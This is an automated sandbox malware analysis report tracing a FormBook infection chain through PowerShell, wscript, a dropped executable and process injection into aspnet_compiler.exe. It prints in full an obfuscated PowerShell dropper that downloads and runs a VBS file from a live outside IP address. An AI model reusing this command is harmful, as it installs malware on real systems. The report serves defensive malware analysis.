Iex($(iEX('[sYsTEM.TexT.EnCODiNg]'+[ChAR]0x3A+[cHAr]58+'UtF8.gETstRING([SySTem.COnVERT]'+[chAR]0X3A+[cHAR]58+'FROMBase64StrinG('+[chAr]34+'JGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYkVyZEVmSW5pdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZanNPcXBMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdKclV3aSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3ZLcGpXbFBZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBGalB6KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieXJabWN4d09YbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRkpNd0h4ZUdIICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRiOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA0LjE2OC43LjcvMzU2L0lFbmV0Ym9va3VwZGF0aW9uLnZicyIsIiRlTnY6QVBQREFUQVxFbmV0Ym9va3VwZGF0aW9uLnZicyIsMCwwKTtzVGFSVC1TTGVFcCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcRW5ldGJvb2t1cGRhdGlvbi52YnMi'+[ChAr]34+'))')))"
                                                              Imagebase:0x4a2e0000
                                                              File size:345'088 bytes
                                                              MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:7
                                                              Start time:04:26:20
                                                              Start date:30/09/2024
                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:pOWeRSHelL.eXE -ex ByPASs -NoP -W 1 -C DEvICEcREdenTialDEPlOymenT ; Iex($(iEX('[sYsTEM.TexT.EnCODiNg]'+[ChAR]0x3A+[cHAr]58+'UtF8.gETstRING([SySTem.COnVERT]'+[chAR]0X3A+[cHAR]58+'FROMBase64StrinG('+[chAr]34+'JGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYkVyZEVmSW5pdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZanNPcXBMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdKclV3aSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3ZLcGpXbFBZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBGalB6KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieXJabWN4d09YbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRkpNd0h4ZUdIICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRiOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA0LjE2OC43LjcvMzU2L0lFbmV0Ym9va3VwZGF0aW9uLnZicyIsIiRlTnY6QVBQREFUQVxFbmV0Ym9va3VwZGF0aW9uLnZicyIsMCwwKTtzVGFSVC1TTGVFcCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcRW5ldGJvb2t1cGRhdGlvbi52YnMi'+[ChAr]34+'))')))"
                                                              Imagebase:0x13ffe0000
                                                              File size:443'392 bytes
                                                              MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:moderate
                                                              Has exited:true

                                                              General

                                                              Target ID:8
                                                              Start time:04:26:28
                                                              Start date:30/09/2024
                                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ao24xfvf\ao24xfvf.cmdline"
                                                              Imagebase:0x13f660000
                                                              File size:2'758'280 bytes
                                                              MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:moderate
                                                              Has exited:true

                                                              General

                                                              Target ID:9
                                                              Start time:04:26:28
                                                              Start date:30/09/2024
                                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB8B5.tmp" "c:\Users\user\AppData\Local\Temp\ao24xfvf\CSC75A1BB69F3FE4BED81ABA0ECFBA99BE.TMP"
                                                              Imagebase:0x13fbd0000
                                                              File size:52'744 bytes
                                                              MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:moderate
                                                              Has exited:true

                                                              General

                                                              Target ID:11
                                                              Start time:04:26:34
                                                              Start date:30/09/2024
                                                              Path:C:\Windows\System32\wscript.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Enetbookupdation.vbs"
                                                              Imagebase:0xffc40000
                                                              File size:168'960 bytes
                                                              MD5 hash:045451FA238A75305CC26AC982472367
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:12
                                                              Start time:04:26:40
                                                              Start date:30/09/2024
                                                              Path:C:\Users\user\AppData\Local\Temp\temp_exec.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Users\user\AppData\Local\Temp\temp_exec.exe"
                                                              Imagebase:0x1160000
                                                              File size:528'016 bytes
                                                              MD5 hash:77733FB5B16FC7AE0944C92FD2E89D7E
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Antivirus matches:
                                                              • Detection: 100%, Avira
                                                              • Detection: 100%, Joe Sandbox ML
                                                              Reputation:low
                                                              Has exited:true

                                                              General

                                                              Target ID:13
                                                              Start time:04:26:40
                                                              Start date:30/09/2024
                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                                                              Imagebase:0x300000
                                                              File size:55'384 bytes
                                                              MD5 hash:A1CC6D0A95AA5C113FA52BEA08847010
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.536381146.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.536381146.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.536316311.0000000000230000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.536316311.0000000000230000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                              Reputation:moderate
                                                              Has exited:true

                                                              Disassembly

                                                              Reset < >

                                                                Executed Functions

                                                                Function 030F0FB9 Relevance: .0, Instructions: 5COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000003.486524305.00000000030F0000.00000010.00000800.00020000.00000000.sdmp, Offset: 030F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_3_30f0000_mshta.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                • Instruction ID: 14886c4c80f8d3a80c248dd874b654bce8759f85b7880923d12c7265329df8b3
                                                                • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                • Instruction Fuzzy Hash:
                                                                Function 030F0FB1 Relevance: .0, Instructions: 5COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000003.486524305.00000000030F0000.00000010.00000800.00020000.00000000.sdmp, Offset: 030F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_3_30f0000_mshta.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                • Instruction ID: 14886c4c80f8d3a80c248dd874b654bce8759f85b7880923d12c7265329df8b3
                                                                • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                • Instruction Fuzzy Hash:
                                                                Function 030F0FC1 Relevance: .0, Instructions: 5COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000003.486524305.00000000030F0000.00000010.00000800.00020000.00000000.sdmp, Offset: 030F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_3_30f0000_mshta.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                • Instruction ID: 14886c4c80f8d3a80c248dd874b654bce8759f85b7880923d12c7265329df8b3
                                                                • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                • Instruction Fuzzy Hash:

                                                                Execution Graph

                                                                Execution Coverage:3.5%
                                                                Dynamic/Decrypted Code Coverage:0%
                                                                Signature Coverage:0%
                                                                Total number of Nodes:3
                                                                Total number of Limit Nodes:0
                                                                execution_graph 3724 7fe899c7ae1 3725 7fe899c7af1 URLDownloadToFileW 3724->3725 3727 7fe899c7c00 3725->3727

                                                                Executed Functions

                                                                Function 000007FE899C7018 Relevance: 1.6, APIs: 1, Instructions: 129filenetworkCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.520946858.000007FE899C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7fe899c0000_powershell.jbxd
                                                                Similarity
                                                                • API ID: DownloadFile
                                                                • String ID:
                                                                • API String ID: 1407266417-0
                                                                • Opcode ID: 9948bc6d770e860b75fa454e1b26024c9bb87e678cf14dd0d4350483a9068b22
                                                                • Instruction ID: dd9d2aec8907b5c0eb7b7e7fbd4249ce01c59a8a7d2b2634bc6a0a032837168b
                                                                • Opcode Fuzzy Hash: 9948bc6d770e860b75fa454e1b26024c9bb87e678cf14dd0d4350483a9068b22
                                                                • Instruction Fuzzy Hash: 14319F31918A5C9FDB58EF5CD885BA9B7E1FB59725F00822ED04DD3661CB70B8068B81
                                                                Function 000007FE89A9566D Relevance: 1.7, Strings: 1, Instructions: 462COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 0 7fe89a9566d-7fe89a95677 1 7fe89a95679 0->1 2 7fe89a9567e-7fe89a9568f 0->2 1->2 3 7fe89a9567b 1->3 4 7fe89a95696-7fe89a956a7 2->4 5 7fe89a95691 2->5 3->2 7 7fe89a956a9 4->7 8 7fe89a956ae-7fe89a956bf 4->8 5->4 6 7fe89a95693 5->6 6->4 7->8 11 7fe89a956ab 7->11 9 7fe89a956c6-7fe89a956d7 8->9 10 7fe89a956c1 8->10 13 7fe89a956d9 9->13 14 7fe89a956de-7fe89a956f2 9->14 10->9 12 7fe89a956c3 10->12 11->8 12->9 13->14 15 7fe89a956db 13->15 16 7fe89a9570e-7fe89a95720 14->16 17 7fe89a956f4-7fe89a9570d 14->17 15->14 18 7fe89a95778-7fe89a9579a 16->18 19 7fe89a95722-7fe89a9574a 16->19 17->16 22 7fe89a957a0-7fe89a957aa 18->22 23 7fe89a95903-7fe89a959cc 18->23 20 7fe89a95766-7fe89a95777 19->20 21 7fe89a9574c-7fe89a95762 19->21 20->18 21->20 24 7fe89a957ac-7fe89a957b9 22->24 25 7fe89a957c3-7fe89a957c8 22->25 24->25 29 7fe89a957bb-7fe89a957c1 24->29 26 7fe89a957ce-7fe89a957d1 25->26 27 7fe89a958a3-7fe89a958ad 25->27 30 7fe89a95816 26->30 31 7fe89a957d3-7fe89a957e2 26->31 32 7fe89a958be-7fe89a958ce 27->32 33 7fe89a958af-7fe89a958bd 27->33 29->25 36 7fe89a95818-7fe89a9581a 30->36 31->23 42 7fe89a957e8-7fe89a957f2 31->42 37 7fe89a958db-7fe89a95900 32->37 38 7fe89a958d0-7fe89a958d4 32->38 36->27 40 7fe89a95820-7fe89a95826 36->40 37->23 38->37 44 7fe89a95828-7fe89a95835 40->44 45 7fe89a95842-7fe89a95884 40->45 47 7fe89a9580b-7fe89a95814 42->47 48 7fe89a957f4-7fe89a95801 42->48 44->45 46 7fe89a95837-7fe89a95840 44->46 56 7fe89a9588a-7fe89a958a2 45->56 46->45 47->36 48->47 50 7fe89a95803-7fe89a95809 48->50 50->47
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.521027443.000007FE89A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7fe89a90000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: V
                                                                • API String ID: 0-1342839628
                                                                • Opcode ID: a479678b65ce08ad0385cb45495db95f81c2607db8560585ec86ca9a3e11ed50
                                                                • Instruction ID: fd20592fea8f5f291ff9d8d875bb358c2a4937fe0ae6976cce51e54cf93bb57d
                                                                • Opcode Fuzzy Hash: a479678b65ce08ad0385cb45495db95f81c2607db8560585ec86ca9a3e11ed50
                                                                • Instruction Fuzzy Hash: F2D1F33180E7C91FD34797389C156AA7FA4EF47260F0911EBD48DCB0A3D619AD1AC3A2
                                                                Function 000007FE899C7AE1 Relevance: 1.7, APIs: 1, Instructions: 159filenetworkCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.520946858.000007FE899C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7fe899c0000_powershell.jbxd
                                                                Similarity
                                                                • API ID: DownloadFile
                                                                • String ID:
                                                                • API String ID: 1407266417-0
                                                                • Opcode ID: 3564d2ac142c4a064d696a39380aff265b310662ce154e6a372ec1fea6ce31e1
                                                                • Instruction ID: 641bd9236fe160d63ae29a915ee22288c1fc05c9ce19101104c63db51e3d72cf
                                                                • Opcode Fuzzy Hash: 3564d2ac142c4a064d696a39380aff265b310662ce154e6a372ec1fea6ce31e1
                                                                • Instruction Fuzzy Hash: 6041E67181CB889FD719DB589C447AABBF4FB56325F04426FD08DD35A2CB646806C781
                                                                Function 000007FE89A910D3 Relevance: 1.4, Strings: 1, Instructions: 157COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.521027443.000007FE89A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7fe89a90000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 8hT
                                                                • API String ID: 0-3237309121
                                                                • Opcode ID: 6535bbaf2d7e746c5f498dd4e1e137fb5df804d6cd80cac6cece6d1d2b96014e
                                                                • Instruction ID: 5cb9a26c2ba6f96fc4d71e192f927842f9946b742bc6eee5028d3211ec5b9afb
                                                                • Opcode Fuzzy Hash: 6535bbaf2d7e746c5f498dd4e1e137fb5df804d6cd80cac6cece6d1d2b96014e
                                                                • Instruction Fuzzy Hash: DF417111A0DBC90FE347937C18642657FE1EF5B259B2911EBC48ECB2A3D9099C5AC362
                                                                Function 000007FE89A98549 Relevance: .7, Instructions: 709COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 101 7fe89a98549-7fe89a98569 102 7fe89a985ea-7fe89a985f9 101->102 103 7fe89a9856b-7fe89a9858a 101->103 106 7fe89a98add-7fe89a98b96 102->106 107 7fe89a985ff-7fe89a98609 102->107 104 7fe89a985a6-7fe89a985e8 103->104 105 7fe89a9858c-7fe89a985a5 103->105 104->102 105->104 108 7fe89a9860b-7fe89a98618 107->108 109 7fe89a98622-7fe89a98629 107->109 108->109 113 7fe89a9861a-7fe89a98620 108->113 110 7fe89a9862b-7fe89a9863e 109->110 111 7fe89a98640 109->111 114 7fe89a98642-7fe89a98644 110->114 111->114 113->109 115 7fe89a98a58-7fe89a98a62 114->115 116 7fe89a9864a-7fe89a98656 114->116 120 7fe89a98a64-7fe89a98a74 115->120 121 7fe89a98a75-7fe89a98a85 115->121 116->106 119 7fe89a9865c-7fe89a98666 116->119 124 7fe89a98668-7fe89a98675 119->124 125 7fe89a98682-7fe89a98692 119->125 122 7fe89a98a87-7fe89a98a8b 121->122 123 7fe89a98a92-7fe89a98adc 121->123 122->123 124->125 127 7fe89a98677-7fe89a98680 124->127 125->115 132 7fe89a98698-7fe89a986cc 125->132 127->125 132->115 137 7fe89a986d2-7fe89a986de 132->137 137->106 138 7fe89a986e4-7fe89a986ee 137->138 139 7fe89a98707-7fe89a9870c 138->139 140 7fe89a986f0-7fe89a986fd 138->140 139->115 142 7fe89a98712-7fe89a98717 139->142 140->139 141 7fe89a986ff-7fe89a98705 140->141 141->139 142->115 143 7fe89a9871d-7fe89a98722 142->143 143->115 145 7fe89a98728-7fe89a98737 143->145 146 7fe89a98739-7fe89a98743 145->146 147 7fe89a98747 145->147 148 7fe89a98745 146->148 149 7fe89a98763-7fe89a987ee 146->149 150 7fe89a9874c-7fe89a98759 147->150 148->150 157 7fe89a987f0-7fe89a987fb 149->157 158 7fe89a98802-7fe89a98824 149->158 150->149 151 7fe89a9875b-7fe89a98761 150->151 151->149 157->158 159 7fe89a98826-7fe89a98830 158->159 160 7fe89a98834 158->160 161 7fe89a98850-7fe89a988de 159->161 162 7fe89a98832 159->162 163 7fe89a98839-7fe89a98846 160->163 170 7fe89a988e0-7fe89a988eb 161->170 171 7fe89a988f2-7fe89a98910 161->171 162->163 163->161 164 7fe89a98848-7fe89a9884e 163->164 164->161 170->171 172 7fe89a98920 171->172 173 7fe89a98912-7fe89a9891c 171->173 176 7fe89a98925-7fe89a98933 172->176 174 7fe89a9893d-7fe89a989cd 173->174 175 7fe89a9891e 173->175 183 7fe89a989e1-7fe89a98a3a 174->183 184 7fe89a989cf-7fe89a989da 174->184 175->176 176->174 177 7fe89a98935-7fe89a9893b 176->177 177->174 187 7fe89a98a42-7fe89a98a57 183->187 184->183
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.521027443.000007FE89A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7fe89a90000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 205ae204219c2402e18d7de51cc26e04ce2e73c4a1ff7402f98aefa934dca7a4
                                                                • Instruction ID: 5d420ec57fad52f8cfa0f989d864b99571293428905c6e5ec159e78f7af94518
                                                                • Opcode Fuzzy Hash: 205ae204219c2402e18d7de51cc26e04ce2e73c4a1ff7402f98aefa934dca7a4
                                                                • Instruction Fuzzy Hash: C722E53090CB894FD799EB2C84506697FE2FF9A344F2401EED48EC72A3DA25AC55C751

                                                                Non-executed Functions

                                                                Function 000007FE89A9352E Relevance: .3, Instructions: 328COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.521027443.000007FE89A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7fe89a90000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b2fa706652c36584d3e379a1d39b7bd771c5e9802942244c1f5348ba4f3fe5cd
                                                                • Instruction ID: a336c185add19374f7c882acfa7d5a8143c9cbe7d835f36ae175ee1c2144e799
                                                                • Opcode Fuzzy Hash: b2fa706652c36584d3e379a1d39b7bd771c5e9802942244c1f5348ba4f3fe5cd
                                                                • Instruction Fuzzy Hash: F9A1132090EBC90FD747A77898142A63FF1EF4B254F1901EBD48DCB1A3D6199D1AC362

                                                                Execution Graph

                                                                Execution Coverage:16.4%
                                                                Dynamic/Decrypted Code Coverage:100%
                                                                Signature Coverage:0%
                                                                Total number of Nodes:59
                                                                Total number of Limit Nodes:5
                                                                execution_graph 4393 7fe8b658d55 4394 7fe8b658d63 4393->4394 4395 7fe8b658d07 4394->4395 4396 7fe8b658dca ReadProcessMemory 4394->4396 4397 7fe8b658eaf 4396->4397 4398 7fe8b658bd5 4399 7fe8b658bec Wow64SetThreadContext 4398->4399 4400 7fe8b658b77 4398->4400 4402 7fe8b658d01 4399->4402 4347 7fe8b6574b1 4349 7fe8b6574bb 4347->4349 4369 7fe8b655c58 4349->4369 4350 7fe8b657704 4353 7fe8b657819 4350->4353 4381 7fe8b655c78 4350->4381 4373 7fe8b655ca8 4353->4373 4354 7fe8b65798c 4377 7fe8b655cd8 4354->4377 4356 7fe8b657b82 4358 7fe8b657b6f 4356->4358 4358->4356 4385 7fe8b655cb8 4358->4385 4359 7fe8b657b41 4361 7fe8b655cd8 VirtualAllocEx 4359->4361 4361->4358 4362 7fe8b657e5d 4363 7fe8b655cb8 WriteProcessMemory 4362->4363 4367 7fe8b657ea8 4363->4367 4364 7fe8b657bf2 4364->4362 4365 7fe8b655cb8 WriteProcessMemory 4364->4365 4365->4364 4389 7fe8b655ce8 4367->4389 4370 7fe8b658740 CreateProcessW 4369->4370 4372 7fe8b6589d0 4370->4372 4372->4350 4374 7fe8b658d80 ReadProcessMemory 4373->4374 4376 7fe8b658eaf 4374->4376 4376->4354 4378 7fe8b658f30 VirtualAllocEx 4377->4378 4380 7fe8b657adb 4378->4380 4380->4356 4380->4359 4383 7fe8b658bf0 Wow64SetThreadContext 4381->4383 4384 7fe8b658d01 4383->4384 4384->4353 4386 7fe8b6590d0 WriteProcessMemory 4385->4386 4388 7fe8b659234 4386->4388 4388->4364 4390 7fe8b6592c0 ResumeThread 4389->4390 4392 7fe8b6580bd 4390->4392 4342 7fe8b6590ad 4344 7fe8b6590bb 4342->4344 4343 7fe8b659057 4344->4343 4345 7fe8b659199 WriteProcessMemory 4344->4345 4346 7fe8b659234 4345->4346 4408 7fe8b658f0d 4409 7fe8b658f1b 4408->4409 4410 7fe8b658eb7 4409->4410 4411 7fe8b658f70 VirtualAllocEx 4409->4411 4412 7fe8b659057 4411->4412 4413 7fe8b65871d 4414 7fe8b658740 CreateProcessW 4413->4414 4416 7fe8b6589d0 4414->4416 4403 7fe8b659299 4404 7fe8b6592a7 4403->4404 4405 7fe8b659247 4404->4405 4406 7fe8b6592f2 ResumeThread 4404->4406 4407 7fe8b65937c 4406->4407

                                                                Executed Functions

                                                                Function 000007FE8B658BD5 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 207threadCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 184 7fe8b658bd5-7fe8b658bea 185 7fe8b658bec-7fe8b658c74 184->185 186 7fe8b658b77-7fe8b658baa 184->186 192 7fe8b658c96-7fe8b658cff Wow64SetThreadContext 185->192 193 7fe8b658c76-7fe8b658c93 185->193 187 7fe8b658bb1-7fe8b658bd0 186->187 188 7fe8b658bac 186->188 188->187 194 7fe8b658d01 192->194 195 7fe8b658d07-7fe8b658d51 192->195 193->192 194->195
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.535786698.000007FE8B650000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE8B650000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_7fe8b650000_temp_exec.jbxd
                                                                Similarity
                                                                • API ID: ContextThreadWow64
                                                                • String ID: b4X
                                                                • API String ID: 983334009-3671448610
                                                                • Opcode ID: 3767bd395431130f195a0110e388832abc52ef1abfcb4ef0be22e8ae60469ecf
                                                                • Instruction ID: 75addba8891021be7a35bca5cc5c1a0fef0bebb52d79dbf560c4e07672c8e5e1
                                                                • Opcode Fuzzy Hash: 3767bd395431130f195a0110e388832abc52ef1abfcb4ef0be22e8ae60469ecf
                                                                • Instruction Fuzzy Hash: 94516E70D0864D8FEB94DF98C845BEABBF1FB69311F1082AAD048D7266D7349995CF80
                                                                Function 000007FE8B65871D Relevance: 1.9, APIs: 1, Instructions: 374processCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 213 7fe8b65871d-7fe8b6587df 216 7fe8b6587e1-7fe8b6587f8 213->216 217 7fe8b6587fb-7fe8b65880b 213->217 216->217 218 7fe8b65880d-7fe8b658824 217->218 219 7fe8b658827-7fe8b65887a 217->219 218->219 220 7fe8b6588a2-7fe8b6589ce CreateProcessW 219->220 221 7fe8b65887c-7fe8b65889c 219->221 225 7fe8b6589d0 220->225 226 7fe8b6589d6-7fe8b658ac4 call 7fe8b658ac5 220->226 221->220 225->226
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.535786698.000007FE8B650000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE8B650000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_7fe8b650000_temp_exec.jbxd
                                                                Similarity
                                                                • API ID: CreateProcess
                                                                • String ID:
                                                                • API String ID: 963392458-0
                                                                • Opcode ID: 85327cf6c67110e144cbc4ff97f45e4cb20f9c17d05a196352d5baf623eae1e0
                                                                • Instruction ID: e8ba50875ee800c4d10976bfdd2be2e32d6c5f02cd8d13149a911e6c1cd75bf5
                                                                • Opcode Fuzzy Hash: 85327cf6c67110e144cbc4ff97f45e4cb20f9c17d05a196352d5baf623eae1e0
                                                                • Instruction Fuzzy Hash: FCC1F670908A1D8FDB98EF58C894BE9B7F1FB59311F1011AE944EE3691DB75AA80CF40
                                                                Function 000007FE8B655C58 Relevance: 1.9, APIs: 1, Instructions: 362processCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
